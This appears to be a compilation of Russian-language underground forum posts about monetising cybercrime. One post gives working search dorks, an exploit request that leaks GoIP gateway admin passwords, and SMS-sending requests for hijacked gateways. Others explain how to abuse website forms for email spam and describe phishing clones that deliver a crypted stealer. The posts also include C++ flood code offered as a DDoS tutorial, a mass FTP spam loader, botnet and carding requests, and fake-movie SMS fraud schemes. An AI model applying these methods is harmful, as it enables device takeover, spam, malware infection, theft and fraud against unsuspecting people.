Так же заранее благодарен за ответы/советы. За деньные отблагодарю сатошиками.
привет
мне надо редиректи (shortner) пот спам е-маил, директ без реклам
может кто подскажет? где и как?
Мы будем искать GSM шлюзы с помощью сервисов shodan.io, zoomeye.org и пытаться
получить к ним удаленный доступ используя имеющиеся уявзимости в прошивках,
затем я немного расскажу как устроена техническая реализация подобной схемы по
рассылкам, приведу цифры и приблизительную стоимость на реализацию, а также
несколько моих личных наблюдений касательно данного вопроса.
Поехали.
Чтобы обнаружить данный метод я решил обратиться к GSM-терминации - способ
обхода роуминговых ограничений между странами и в целом углубиться как это
происходит. Для реализации GSM-терминации используются GSM-шлюзы, в нашем
случае мы будем рассматривать GoIP.
Дорк для обнаружения ip адресов шлюзов GoIp
Code:Copy to clipboard
zoomeye: /default/en_US/status.html
shodan: HTTP/1.0 401 Please Authenticate WWW-Authenticate: Basic realm="Please Login"
Я использовал уязвимость(описание exploit-db.com/exploits/44051), которая при отправке GET запроса выдает конфигурацию сервера вместе с админским паролем в незашифрованном виде.
Пример:
5.163.42.4:4040//default/en_US/frame.html?content=/dev/mtdblock/5
IP адрес немного изменен, чтобы никто из вас не нанес прямого ущерба)
Поскольку сервисы zoomeye и shodan способны находить ip адреса по всему миру,
следовательно рассылку можно делать во многих странах.
http://prntscr.com/qeddn1 - так выглядит окно, если прошивка уязвима
После получения доступа к шлюзу необходимо отправить гет запрос вида
http://5.163.42.4:4040/default/en_US/send.html?u=admin&p=admin&l=1&n=XXXXXXXXXX&m=YYYYYYYYYY
u=admin – имя пользователя
p=admin – пароль
l=1 – канал, с которого надо отправить сообщение
n=XXXXXXXXXX – номер получателя (надо указывать начиная с цифры, к примеру не
+1, а просто 1 если речь идёт о США или Канаде)
m=YYYYYYYYYY – текст сообщения
Теперь немного о каналах. Шлюзы разных моделей имеют до 32 каналов, например у нас на руках есть шлюз, в 17 каналах которого вставлены 17 симкарт, а в остальных 15 ничего, таким образом если мы отправим гет запрос со значением L=18 то получим ошибку, так как симкарты в канале нет. Наличие симкарт и их каналы можно посмотреть в веб интерфейсе шлюза, также оттуда можно отправить тестовое сообщение, чтобы удостовериться на каких каналах имеется возможность отправлять смс-сообщения. Помимо этого шлюз поддерживает USSD, с помощью этих команд мы сможем узнать номер телефона и использовать его под прием смс сообщений, настраивать тарифный план и многое другое.
Чтобы создать подобного рода GSM сеть нам нужен шлюз и симкарты, у GoIP есть также сим-банки, которые в свою очередь могут быть использованы в роли сим- сервера.
Объясняю что это такое и для чего нужно.
Например, вы находитесь в России, а ваш шлюз в Польше, и ездить в Польшу
вставлять сим-карты в шлюз не вариант, поэтому мы берем симбанк в России,
включаем режим сим-сервера, указываем на шлюзе(который в Польше) ip адрес сим-
сервера, таким образом получается, что все сим-карты в сим-сервере "как-будто
бы" находятся в шлюзе, затем мы берем симкарты Польши и вставляем в симбанк, и
начинаем слать с них смс в другие страны евросоюза, на моей практике удавалось
отправить до 5 000 смс с одной симкарты по европе, поскольку имеется безлимит
на звонки и смс. Всё это несколько сжато и не раскрыто, но информации более
чем достаточно, чтобы самостоятельно организовать подобную схему и делать
рассылку, далее опишу минусы и собственные наблюдения по данному вопросу.
В качестве минусов можно заметить, что в данном методе сим-карты это расходный
материал, и их надо много. Благо есть люди, которые продают оптом сим-карты в
ЕС(но это не я)
Второе: многие смс рассылки загибаются из за антиспам политики самих GSM
операторов. С этим надо экспериментировать.
Третье, в случае смерти симкарт необходимо их оперативно заменять.
Теоретические минусы закончились.
Теперь коротко о цифрах, разные модели GoIP стоят по разному, но самая дорогая 32 канальный шлюз -1к$, симбанк около того, хотя самый дорогой 2к$, скорость рассылки с одного канала - 1смс=15сек. То есть 4 смс в минуту оптимально. На основании этих цифр можно посчитать необходимый бюджет.
Однако есть еще кое что - на тематических форумах по GSM терминации предлагают различного рода варианты аренды этих самых шлюзов вместе с симкартами и человеком, который будет заниматься, цена аренды около 200$ в месяц, ну и конечно же отдельно сим-карты.
Как вариант можно купить симбанк, заказать симкарты себе, похекать пустой шлюз в европе и подключить его к своему симбанку.
Помимо шлюзов GoIP есть и другие устройства, например промышленный роутер RB- MTX. Скорость отправки на нём выше, чем на GoIP в 5!! раз, хватает задержки 3 секунды, чтобы слать как из автомата, цена на данное устройство около 300$, кол-во симкарт - 1. GoIP выгоднее, так как предназначен именно для этого
Чтобы послать сообщение с данного устройства нужно отправить гет запрос вида
http://192.168.0.1/sms.php?cmd=sendmessage&nr={номер
без +, например 79876543210}&msg=(ваше сообщение английскими буквами в
юникоде)
Дорк
Code:Copy to clipboard
shodan: "Enter username and password"
На момент написания этой статьи все вышеперечисленные данные актуальны и проверены в бою
Ну привет ребят.
Вообщем чел ввел блог на експе
forum.exploit.in
потом че то его перекосило, он пошел в инфоцыгане, в тг канал завел, начал
учеников набирать за дохуя бабок.
Курс обучалово по мыло спаму.
Сам автор ТГ канала удалил свой тг, либо долблюсь в очи, но не смог найти его
блог в тг с хепи историями.
Сам курс выглядит так.
Ну а сам линк для скачки, выглядит так:
You must have at least 10 reaction(s) to view the content.
Изучайте, тестите. Так то мельком глянул, работа по смтп, не вебмейлера, много
воды бывает, но для новичков самое то.
Так же полезна папка софты. Имап парсер, и пдф генератор для аттачей.
Слава XSS! Героям спама слава!
Какую тему для ленда лучше выбрать чтобы лить с трафф с данных ресурсов?
Какие категорические не стоит пытаться сделать?
Буду благодарен за ответы!
неплохой мануал по работе с адвордс
Вебфайл
пароль:
Пароль: medved
Всем доброго времени суток!
Сегодня я спалю вам одну крутую вертикаль, через которую многие делают кеш - поиск и рассылку с доноров.
Итак, приступим! Что такое доноры?
Доноры — это сайты, где есть форма взаимодействия с пользователями с
возможностью отправки email. Чаще всего присутствует в виде: блока
регистрации, формы подписки, формы заявки, формы оформления заказа.
https://************/discussion/attachments/foto5-png.38796/
А донорами их называют неспроста, мы используем их сервер рассылки, как хирург
использует донорское сердце. И чем крупнее ресурс, тем больше сообщений он
рассылает своим пользователям. А, следовательно, имеет больший траст у
поисковых фильтров. И тем больше сообщений мы сможем с него разослать.
На данном этапе следует понять схему работы с донорами.
https:///discussion/attachments/foto2-png.38797/
Но если бы было все так просто я бы не писал эту статью, дьявол кроется в
деталях https:///discussion/xray_smailes/ab.gif
Как искать доноры?
Поиск доноров можно разделить на несколько этапов.
Первым будет выбор поисковика: google.com, yandex.ru, ecosia.org
Для себя я нашел два подхода работы. Это выбор местных поисковиков страны, таковым для нас является яндекс. Для поиска сайта на конкретном языке и в конкретном регионе. Но как правило это плохо коррелируется с операторами поиска - следующим подходом, на котором мы подробно остановимся.
Операторы позволяют, сделать процесс поиска необходимой информации более гибким и точным, что позволяет отсеять большинство мусора.
Приведу вам несколько примеров операторов гугла:
Code:Copy to clipboard
intext:"подписаться на рассылку" – поиск по текстовому вхождению
intext:"subscribe to newsletter"
intext:"name" "email" – лучше всего сочетать разные языки с операторами
inurl:/subscribe/ - поиск по вхождению в url
site:.ch – поиск сайтов с доменами в зоне ch
https://************/discussion/attachments/foto3-png.38798/
Обязательно комбинируем эти запросы со стандартными инструментами поиска. Например, в зависимости от региона прокси хотя был использован один язык в запросе, мы получим разную выдачу. Также очень хорошо работает ограничение поиска по времени, благодаря этому мы всегда может отловить свежие формы.
Это лишь малая часть поисковых запросов, более подробную информацию вы можете загуглить сами.
Вторым этапом будет масштабирование связки. Предположим мы уже нашли уязвимый сайт. И в нем оказался уязвимый плагин отправки уведомлений.
Дальше мы ищем части кода этого плагина в tsearch.ru или publicwww.com. Или уникальные индикаторы, одним из которых может выступать копирайтинг - в гугле. И получаем в выдаче уже на один, а несколько сайтов в зависимости от нашего везения.
А теперь небольшой лафхак, можете заглянуть на свою старую почту. Как правило, для активной работы такие доноры уже не пригодны, так как отработаны. Но все же с ними есть шанс поработать, если они подходят нам по критериям.
Обязательно тестируем сайт полностью, не всегда найденная через поисковик
форма нам подходит. Но часто так встречается, что у нее по соседству есть
форма, подходящая нам по всем критериям.
https:///discussion/data/attachments/38/38145-7839cb8d19d6aae88db906c1be64a698.jpg
https:///discussion/data/attachments/38/38146-726a081f2fd3d00e0b2e00e246f9bf07.jpg
Критерии подбора доноров
Пожалуй, основным и критическим критерием при подборе сайта донора является возможность отправки активной ссылки.
Code:Copy to clipboard
www.************ or https://************/
У разных сайтов, есть разные ограничения форм UGC.
По количеству символов, по конкретным символам например «/» И там где форма выдаст ошибку на https:/// она с радостью проглотит www.
В лучшем случае у вас получается вставить целый html в форму ввода.
Code:Copy to clipboard
<a href="https://************/" target="_blank">Переходи по ссылке</a>
также можно будет выделить и наш креотив жирным красным цветом
Если такой возможности нет, донор нам не подходит.
Если донор позволяет слать активной ссылкой, проверяем его инбокс в разных почтовиках. Не редко бывают случаи что яндекс отказывается инбоксить с донора, но письма без проблем залетают в майле.
Последним критерием, но далеко не последним по значимости будет - сложность автоматизации. Ведь если мы нашли, отличного донора, который шлет в инбокс нужного нам почтовика, но не смогли отснифать запрос и разгадать секретки – считай мы не заработали. Не спорю можно работать на web, но объемы будут в 100 раз меньше, а нагрузка на железо возрастет обратно пропорционально объемам. На этом уровень для новичков заканчивается и начинается хардкор.
Анализ трафика
Предположим, что мы смогли найти подходящий под наши критерии сайт донор.
Дальше следует отснифать его запросы. Для этого мы создаем простой каркас на web, который в дальнейшем сможем использовать, если у нас не получится разгадать секретки и создать post/get
Для того чтобы отснифать запросы стандартными средствами ProjectMakera следует включить монитор трафика, как на скриншоте ниже.
https://************/discussion/attachments/foto8-png.38802/
Далее заполняем все поля на сайте, как это делали при подборе доноров и нажимаем отправить.
https://************/discussion/attachments/foto7-png.38803/
Сразу после этого в мониторе трафика появится нужный нам post запрос. Именно с ним мы и будем в дальнейшем работать.
Дважды кликаем по строчке запроса, после этого откроется дополнительное окно с параметрами.
https://************/discussion/attachments/foto9-png.38804/
Для работы с запросами нам потребуется URL запроса, его тело которое находится во вкладке «Параметры» и при необходимости Cookie.
Для того чтобы работать с телом запроса его нужно декодировать в читаемый вид. Я это делаю на сайте https://www.url-encode-decode.com/
https://************/discussion/attachments/foto10-png.38805/
Здесь же мы видим данные, которые указали при заполнении формы в ProjectMakere.
Создание Post запроса
https://************/discussion/attachments/foto11-png.38807/
Переносим расшифрованный запрос в кубик Post запроса и выполняем. Если
отправка прошла и письмо упало на почту меняем параметры, которые указали выше
на свои переменные. Обычно это email получателя, креотив он же призыв к
действию и собственно наша ссылка.
Как правило, остальные параметры в теле запроса можно или эмулировать (вставить рандомные), или спарсить на предыдущих страницах сайта regex, точно также можно поступить и с куками.
Подробнее сейчас остановимся на куках и работе с ними. Если сайт не хочет
принимать наш post запрос и сыпет всяческими ошибками возможно нам не хватаем
эмуляции кук как на фото ниже.
https://************/discussion/attachments/foto13-png.38811/
User Agent из профиля можно заменить на свой, cookies же мы парсим regex,
делая для этого простой get запрос как на скриншоте ниже:
https://************/discussion/attachments/foto12-png.38808/
Подробнее про работу с post/get запросами вы можете найти у нас на форуме.
Результатом нашей работы будет письмо такого содержания, упавшее в инбокс
нужного нам
почтовикаhttps:///discussion/attachments/foto-14-png.38809/
Теперь лишь нам осталось автоматизировать процесс рассылки и проверку инбокса,
добавив списки баз и прокси. А также контрольки, каждые 100, 500, 1000, 2000,
5000, 10000 почт или по своему усмотрению.
https:///discussion/attachments/foto15-png.38810/
Если у вас остались вопросы после прочтения статьи, посмотрите видео с практической частью поиска и настройке донора.
Автор Dorian_Gray
Всем привет. Занимаюсь трафиком в **популярных **зарубежных источниках. Баны
ловлю крайне редко, модерацию с клоакой прохожу почти всегда без проблем,
платежки нашел, как подключать, всё вроде бы отлично. Поэтому сопоставив свой
интерес в карже и логах, возникла идея заниматься по своей специфике - давать
трафик на почти ~~свой~~ продукт. Идея, как обычно ей присуще, была великая -
даешь 1 лог в 1 руки! Долой биржи и говнотраф. Долой монополию Росса. Хватит
майнкрафт и роблокс, даешь палку каждому логоводу.
Представили? ?
Естественно всего этого не произошло. Хоть и скурпулёзно изучался материал,
отбирались лучшие варианты по цене/качеству, первому блину все же суждено было
стать комом. Подробнее: сервер я взял на Namecheap - VPS 11$ per mounth,
поднял на нем nginx и даже думал осуществить клоаку прямо на ВПС через
нгинкс.конф, однако потратив уйму времени, решил взять недельный триал ПХП
клоаку от хайд клик ( лайфхак для трафферов, которые не хотят платить за
клоаку или настраивать ПиксельК или Бином). Параллельно я выбирал варианты
инжекта. Перелопатив пару форумов и встречяя разные мнения, я пришел к тому,
что создал фишинговый сайт 1 в 1, как сайт официального софта для Виндовс,
отличие только в доменной зоне. Почистил код от метрик, пикселей и прочей
дряни, установил ссылку
на скачивание правильного файла везде, где смог. Что за файл? Тут я решил
выбрать стиллер, который не так давно появился, но положительных отзывов
снискал. Купил, поставил админку, отдал на крипт, склейку и сертификат. делал
мне один чел с бхф. Хоть и пытался он старательно решать проблемы, но все же
бывало, что с криптом затягивал на 3 дня и несистематически бывал онлайн.
Крипт делал на Си ( как оказалось это было одной из ошибок) По юности своей,
наивности или скромному опыту, я решил, что белый софт должен обязательно
работать и юзеры, скачивающие софт с моего сайта, должны запускать его без
подозрений, что параллельно еще и запускается билд. В связи с этим вся
программка для винды весила аж по 20 метров. Но крипт хотя бы не давал алертов
в браузерах и по ссылке качался сразу в папку Downloads. С радостью я решил
проверить, как там отстук ( с моего компа стучало без нареканий) Пролив с
биржи показал отстук аж... до 40% Мой параллельный пролив трафика с буржуйской
аудитории вообще не дал отстука.
Тут я почерпнул несколько ошибок:
1) Крипт надо делать нормальный, а не шарп, натив. Во всяком случае для
моего стиллера
2) Вес софта должен быть минимальным, не под 20 метров ( хотя для людей,
качающих софт ,по идее, нет разницы между 1.5 и 20 мб)
3) Вариант инжекта должен быть более проработанным и отрабатывать сразу
несколько гипотез. Сайт 1 в 1, как у офф софта, пусть даже с ССЛ и мгновенным
редиректом на настоящий официальный сайт сразу после начала скачивания не
всегда может работать, как успешный вариант заражения
4) Помимо нескольких вариантов заражения должно быть несколько стиллеров (
либо 1, но отработанный и протестированный). Да и самих спецов, что криптуют
лучше иметь более 2ух, т.к. в действительности 1 постоянно куда-то пропадал.
Потратив уйму сил, времени и не получив собственно ничего, я решил остаток трафика слить на партнерские программы. У меня до этого хорошо получалось делать мобайл инсталлы. Поэтому взяз оффер казино на EU я запустил трафик. Из 60+ инсталлов у меня по итогу в партнерке отобразилась 1 регистрация. В другой партнерке у меня оплата была за депозиты. Из около 150 инсталлов, 40 регистраций - ни одного депозита. Трафик платежеспособный, когда я лил точно такой же на СНГ и результаты были не просто лучше, а значительно лучше. Но я давно уже отказался рекламировать скам продукты на СНГ, Азию и другие бедные страны. Если с помощью стиллера воруются данные платежек, баланс которых в 97% случаев будут возвращены КХ европейскими и Американскими банками или тем же пейпал, то выманивать мошенническими обещаниями деньги у жителей не самых благонадежных стран, которым никто потом не возместит и не компенсирует, я считаю очень коварно и не хорошо. Все же даже в этой сфере должна быть честь, поэтому я даже с некоторой радостью воспринимаю тот факт, что с казино у меня не сложилось, а гемблинг на СНГ лил очень непродолжительно и к этому больше не возвращался. Это я к чему. Говнопродукты на партнерках очень часто ненадлежащего качества не только для потребителей, но и для арбитражников, которые льют трафик и получают нули в стате.
Постскриптум : у меня вроде бы еще оставались живые акканты с матом.
Поэтому в ближайшие дни могу хоть на практическибезвозмездном основании
предоставить вам трафик на интересный проект. Через неделю, возможно, уже буду
занят новым клиентом, но это время терять также не хочется + мат пропадет,
если уже не пропал. Опыту по трафику достаточно много, могу и ТЗ поставить и
сам решить, если что надо.
В ходе запуска ботнета также появилось немного опыта по сервакам, да и знаний
в других смежных областях не убавилось, а наоборот.
Такой мой скромный первый опыт в этом нелегком деле. Тем не менее, я не
отчаиваюсь и с радостью выслушаю критику
Всем кто прочели оставил мнение аптайм 99+, абузоустойивости и отстука 95+ ? ??
Привет всем
Мониторю одного персонажа, зовут его Евгений
Горбатов(youtube.com/channel/UCdEcZ3v46iR1jhHzoRV92OA) утверждает что он
занимается добычей трафика метод спама почты,
якобы делает спам со своих smtp серверов, не вкурсе сколько у него их, но
заверяет что доход 1-2 мульта в месяц, ну + продает обучения и т д
так вот вопрос, реально ли спам почт прибыльно делать рассылку на парнерки или все же он п*здабол?
спасибо за ответы))
Посоветуйте пожалуйста бот с функциями:
Существует такой в природе из паблика?
Заранее благодарен
Почитал сабж на хабре тут (с
одного из постов у нас прогулялся) и посетило меня несколько мыслей.
Будем исходить из того что мы не аццкие ддосеры, а как раз наоборот нас решили
посадить на бабло.
Ну так вот, на хабре прозвучала идея сменить А записи в днс на локалхост
(127.0.0.1) и покурить. Теоретически такой заворот должен создавать ряд
проблем для активно атакующих ботов ибо если нет толкового лимита на создание
потоков - тачка просто сдохнет переваривая сама себя.
Если пораскинуть мозгами, то можно изобрести еще кучу методов, чтобы нагрузить
тачку бота, отсюда - большие потери ботов у ддосера (я думаю постоянный
зависон спровоцирует даже ленивого юзверя ребутиться и в конечном итоге
похерить\полечить винду). Как только финансовые затраты на восстановление
ботнета станут больше ожидаемой выгоды от шантажируемого, то любой разумный
ддосер уйдет сам.
А как вы считаете? Может предложите какие то методы для организации предложенного метода antiDDOS, например зацикливание на уровне маршрутизации пакетов.. что еще может создать кучу проблем бестолково написанному боту?
Ребята, выложите плз "чистый" be 1.7, очень надо, найти не могу.
Привет,
Есть кто обучает как добывать сс США ЕУ?
Только через гаранта.
.::MassDirectMailLoader::..
Функциональность
-Проверка списка фтп-хостов(вида login : pass@ftp) на валид и пригодность для спама с помощью DirectMailer
-Автозалив скрипта(вашего) DirectMailer и всего к нему прилагающегося на хорошие хосты
-Авторазделение и автозалив мейл базы на хорошие хосты
-Запуск рассылки со всех хостов одновременно
-Сбор статистики со всех хостов
-Удаление всех файлов после рассылки
Программа написана мной и другом muxxxa
качаем здесь
_http://rapidshare.com/files/102915286/MDML1.6Final.rar.html
напоминаю что для работы программы нужен скрипт DirectMailer 1.6.x
все вопросы по использованию задавайте здесь
кто работал?
кто что думает?
сейчас регнулся жду, когда суппорт активирует.
кто как траф гонит?
кто кардит, кто спамит?
выплаты норм идут?
рассказываем)
к сожалению не нашел более подходящего раздела.
Принципы и практическая реализация DDoS атак
Я немного напомню про реализацию ДДос атак. Весь принцип основывается на том, что атакуемая машина перегружается левыми запросами, которые нужно обрабатывать и тратить свои ресурсы. И когда количество требуемых ресурсов выше, чем существует, то машина зависает. Я буду это реализовать на С++. Все что нам нужно, это посылка дынных на атакуемый сервер. Я буду в качестве цели использовать вэб сервер. Ну что, начнем пожалуй кодить. Для посылки данных вэб серверу можно использовать сокеты или wininet. Отправка дынных через wininet гараздо проще, чем через сокеты, но все же не будем этот способ отбрасывать и я покажу как это реализуется.
Отправка данных вебсереверу испльзуя wininet
для начала добавим к исходнику эти строчки:
Code:Copy to clipboard
#include <wininet.h>
#pragma comment(lib,"wininet.lib")
это необходимо для того чтобы использовать wininet. теперь определим "мусор", который мы будем посылать.
Code:Copy to clipboard
static TCHAR hdrs[] = _T("Content-Type: application/x-www-form-urlencoded");
static TCHAR frmdata[] =_T("userid=1&passwd=qwerty");// здесь мы опрелеляем, что именно мы будем передавать
// мы передаем форме айди юзера равное 1 и его пароль qwerty
statuc TCHAR accept[] =_T("Accept: */*");
Так, опреледившись, что мы будем передавать форме, нужно это передать серверу. Ну чтож приступим. Делается это очень легко:
Code:Copy to clipboard
HINTERNET hSession = InternetOpen("Ослик",INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
// открываем сессию
HINTERNET hConnect = InternetConnect(hSession, _T("Имя сервера, напр. microsoft.com"),INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 1);
// соединяемся с сервером
HINTERNET hRequest = HttpOpenRequest(hConnect, "POST",_T("Имя формы, которой мы будем передавать данные"), NULL, NULL, accept, 0, 1);
HttpSendRequest(hRequest, hdrs, strlen(hdrs), frmdata, strlen(frmdata));
// сама передача дынных форме.
Как все просто. С wininet разобрались, но есть еще способ через сокеты. Он конечно кривой, грамоздкий, но всеже заслуживает внимания.
Отправка данных вебсереверу испльзуя сокеты
Я буду использовать вторые сокеты. Теперь определим, что будем их использовать
Code:Copy to clipboard
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")
Тепрь создадим "мусор":
Code:Copy to clipboard
char *RbcMessage[] =
{
"GET /index.php HTTP/1.1\r\n",
"Accept: */*\r\n",
"Referer: http://www.127.0.0.1.ru\r\n",
"Accept-Language: ru\r\n",
"Accept-Encoding: gzip, deflate\r\n",
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)\r\n",
"Host: www.google.com\r\n\r\n\r\n",
NULL
};
int iMsg = 0;
Теперь проинициализируем сокеты
Code:Copy to clipboard
WSADATA WSAData;
WSAStartup(MAKEWORD(2,2), &WSAData);
// вот здесь я прописываю что будет использоваться вторая версия сокетов.
Далее будет идти создание сокета и назначения ему пункта доставки нашего "мусора":
Code:Copy to clipboard
SOCKET sock;
sock = socket(AF_INET,SOCK_STREAM,0);
sockaddr_in sendsock;
sendsock.sin_family = AF_INET;
sendsock.sin_port = htons(80);
// 80 порт - порт веб сервера, но я надеюсь, что вы это знаете
sendsock.sin_addr.s_addr=inet_addr(127.0.0.1);
// прописываем ip адрес жертвы
C целью определились и теперь можно все это передавать
Code:Copy to clipboard
connect(sock,(LPSOCKADDR)&sendsock,sizeof(sendsock));
for(iMsg = 0;(RbcMessage[iMsg]); iMsg++)
send(sock, (LPSTR)RbcMessage, strlen(RbcMessage[iMsg]), 0);
closesocket(sock);
хотелось бы услышать отзывы о статье. если понравиться, то буду писать еще. в это сфере у меня много знаний и наработок
Захотелось создать небольшой ботнет.
Возможности ставить ирк-сервак нет. Хочется чтоб рулить ботами можно было с
локалхоста php скриптом.
Бот надо нахаляву, т.е. предлагать купить ненада. Желательно с
самораспространением.
Что посоветуйте?
zTDS Бесплатная клоака, которая не уступает платным аналогам
Приветствую читателей данной статьи. (Хотя скорее всего это просто обзор)
Не так давно когда я тестировал различные способы добычи трафика\инсталлов - я
надолго засел на дорвеях.
Как правило на дорвеи нужна качественная клоака, чтобы можно было отправлять
ботов поисковиков на "белые" страницы, а реальный трафик направлять на ПП, или
же в моём случае на лендинг.
Именно о такой клоаке я хочу вам сегодня рассказать, а именно zTDS
(клик) (пароль ztds)
Минусы zTDS:
Если сравнивать zTDS с платными аналогами, то zTDS в этом плане немного
сложнее, по скольку в этой TDS не будет волшебной кнопки, по которой все само
установится и заработает.
У zTDS есть мануал по установке на сервер + большинство дорвейщиков используют
именно эту клоаку, так что если вы не сможете ее установить ручками - всегда
можно обратится к старичкам на различных тематических форумах.
На этом минусы подходят к концу)
Плюсы zTDS:
(просто скриншот с главной страницы)
Spoiler: Скриншот
Подробный мануал о клоаке трафика с помощи zTDS:
Hidden content for authorized users.
![d-zeus.ru](/proxy.php?image=http%3A%2F%2Fd- zeus.ru%2Ffavicon.ico&hash=c16abfffb8f82b7267a70317758e6ae0&return_error=1) d-zeus.ru
Так же zTDS имеет собственную базу ботов, которая обновляется каждые сутки.
Надеюсь я смог уберечь чьи-то деньги) Спасибо, что дочитали данный обзор до
конца.
Если вам будет интересно - могу рассказать подробнее о данной TDS (клоака,
установка, настройка редиректов) А так же поделится своим опытом в дорвеях.
Народ - я никогда не работал с Тумблр.. подскажите как это работает - что тумблр редиректит на какой то внешний сайт?
You must have at least 1 reaction(s) to view the content.
**Слив из под небольшого хайда бухты.
Будет полезен новичкам.
В дальнейшем воможны еще "сливы" интересностей.
Но естественно без вреда.
Возможно подумаю о "сливе" на заказ интересных схем-мануалов-курсов, но без
особого фанатизма.
Четыре простых схемы по добыче инстала.
**
Схема №1
Заработок на загрузочном трафике
Материал:
-свободное время и усидчивость
Схема:
При помощи этой схемы, вы начнете получать доход уже спустя несколько суток.
Чтобы схема работала правильно прочтите пожалуйста внимательно этой текст.
Начнём. Источник: *************** Вы знаете что ВKонтакт один из самых больших
сайтов, посещаемость которого ежедневно привышает миллионы человек,и поголовно
каждый пользуется внутренним поиском. Большой плюс для вас в том, что
поисковые системы могут его индексировать - страницы, группы и паблики. И
именно потому в основном вам предстоит работать с Вконтактом.
Думаю что у Вас уже есть учетная запись (нет-зарегистрируйтесь) в вконтакте.
Если же есть, то это хорошо (желательно использовать фейк).
Создаете Сайт.
Теперь вам предстоит придумать себе тему для сайта,важно то, чтобы вам не было
очень большой конкуренции по ключевым словам. Что бы вам было проще понять все
это буду делать по примерам.
Создаете сайт,к примеру, тема свадьба, загружаете на него красивые свадебные
картинки,и пишите небольшие уникальные тексты - например: свадебные платья
2018 года, выкуп невесты - сценарии, свадебы в Норвежском стиле и т.п. .
Времени на одну страницу уходит не более 30 минут. Вот,к примеру, покажу на
примере заработка на ключевом слове "Выкуп невесты - сценарии".
Переходите на
http://wordstat.yandex.ru и
смотрите сколько же аборигенов ищут этот ключ.
Допустим,видите что за месяц в Яндексе его ищут около 150 000 человек, если
брать во внимание еще и Google,то можно с уверенностью говорить о цифре 300
000 человек.
Теперь,смотрите в поиске VK есть ли группы или паблики с названием "Выкуп
невесты" (ясное дело есть такие группы,и самая большая из них имеет около 1800
подписчиков, это очень мало, но она самая первая в выдаче). Поверьте, что даже
в маленькую группу,заходит с поиска вконтакте и поисковых систем без проблем
не менее 50-100 человек, которые и будут предполагаемым источником ваших
инсталлов.
Создаете Паблик или публичную страницу
И так,вы увидели что в группе, которая в топе , только 1700(примерно) человек.
Поэтому не сидите без дела и создаете свою группу. Давайте лучше паблик, так
как группы больше спамлятся.
И так, создали паблик и даете ему название - "Выкуп невесты. сценарии" и
красиво его оформляете .
И СНОВА К САЙТУ
Теперь,давайте вернемся к вашему сайту о свадьбах, а именно к странице "Выкуп
невесты". На странице должен быть читаемый контент, качественный, картинки,
что бы людям было интересно читать. Можете даже опубликовать один или два
сценария. А теперь важно, в низу страницы делаете например такую надпись
"Хотите больше сценариев?Вы можете их скачать у нас на сайте по ссылке ниже"
Еще ниже ставите ссылку "СКАЧАТЬ" - Сделайте так, что бы посетитель попадал
не сразу на скачивания файла после нажатия на ссылку "СКАЧАТЬ", а на другую
страницу вашего сайта где уже и сможет скачать этот файл, так как вконтакте
может забанить Ваш паблик если он будет вести на сайты с партнерками такого
вида) - Текстовый документ или архив загружаем на ваш хостинг и подключаем к
нему партнерку по монетизации загрузочного трафика. К примеру
http://loadmoney.ru ,но можете
использовать и другие аналогичные.
То есть все посетители, которые скачают ваш архив будут приносить нам по 2 или
4 рубля.Вопрос теперь в том, как сделать что бы на вашу страницу попадало как
можно больше целевых посетителей!?
Очень просто (относительно),надо чтобы ваша страница была в топе (то есть
около 2000 подписчиков)
Прибыль: Сделайте 10 пабликов и получайте стабильно в среднем 100-150
руб./сутки
Схема №2
Для этого нам понадобится наш сайт ( можно бесплатный, можно платный ). С
платного естественно доход больше будет, ну и ~50 рублей.
Источник: ***************
И так приступим.
Заходим на сайт loadmoney.ru , создаём сайт к примеру с такими файлами, так
сказать, скачать музыку, скачать мультики, скачать фильмы для взрослых, ну и
т.д.
Делаем приятный дизайн, под вашу тематику.
Далее идём в партнёрку ( на лоадмани.ру ), там вам выдадут код через который
люди должны будут скачать ваш файл (музыка, фильмы, мультики).
Заливаем эти ваши (фильмы, мульты, музон) через этот код, и после нам
понадобятся такие сайты как (seosprint,wmmail и другие).
Создаём задание мол перейдите на мой сайт ( ссылка на ваш сайт ), и скачайте
песню, фильм, программу.
За задание выставляете цену - 0.50 копеек.
Партнерка вам платит - 2 рубля за скачивание.
Вы платите людям - 0.50 копеек.
Выгода 1.50 рублей.
Вы тратите 100 рублей = 400 рублей выгоды.
Вы тратите 1000 рублей = 4 тысячи рублей выгоды.
Схема №3
В какой нише будем работать? Мы будем зарабатывать на увлечении людей, в
основном на кинотрафике. Источник: ***************. Только представьте себе,
сколько людей сейчас смотрят фильмы.… Очень много.
Мы будем делать сайты под премьеры - новые фильмы, которые вот-вот выйдут.
В чем суть мануала? Мы будем создавать сайты-одностраничники под кино-
премьеры, продвигать их в ПС google, вешать кино и download партнерки. В
основном заработок будет с смс. Да именно на смс. Сейчас даже плюнуть нельзя,
не отправив смс.
Если вы переживаете за свою карму – часть денег отдайте друзьям, родным,
близким людям! Если вас не смущает данный вид заработка – поехали!
1. Регистрация в партнерке.
И так, для начала нам нужно зарегистрироваться в патнерке. В ней мы будем
настраивать стоимость смс и брать необходимый код для нашего одностраничника.
Я работаю с такими ПП как:
Не обязательно регистрироваться во всех. Как написано выше – это пп, с
которыми работаю я.
Для начала регистрируемся в websharks.ru. Знакомимся с интерфейсом, понимаем,
как работает пп. В базе огромное количество фильмов. + постоянное обновление
по каждому новому фильму, которого, конечно еще нет. Это называется Фейк. Вот
именно на эти фильмы мы будем делать сайты.
Рассмотрим, как выглядит наш одностраничник с интегрированным в него фейком.
Мы видим плеер в стиле vk.com и блок комментариев, тоже в стиле vk.com.
Комментарии включаются в партнерке, вам ничего делать не нужно будет. Комменты
и плеер в стиле vk.com очень повышают траст пользователя к сайту. Но, если вы
хотите другие стили – пожалуйста, их легко переключать в кабинете пользователя
в websharks.ru. Но я рекомендую именно стиль vk.com!
После того, как человек запускает плеер, ему показывают начало фильма.
Человек вводит номер – ему приходит код – он вставляет его и с баланса снимают
деньги. Все просто. Думаю, вы сталкивались 100%
Вся статистика по просмотрам / смс / прибыли находится в личном кабинете ПП.
Фильмы выходят практически каждый день, их количество просто зашкаливает! И
фильм фильму рознь. Если на сайте о сумерках трафф доходил до 15к дейли, то на
сайте «Экипаж» траф был мизерным… Далее мы поговорим о том, как же правильно
выбрать премьеру.
2. Выбор фильма.
Думаю, тут проблем не будет! Идем на
http://www.kinopoisk.ru/premiere/ru/
и наблюдаем картину списка всех ожидаемых премьер. Фильмы сортируются по дате
автоматически.
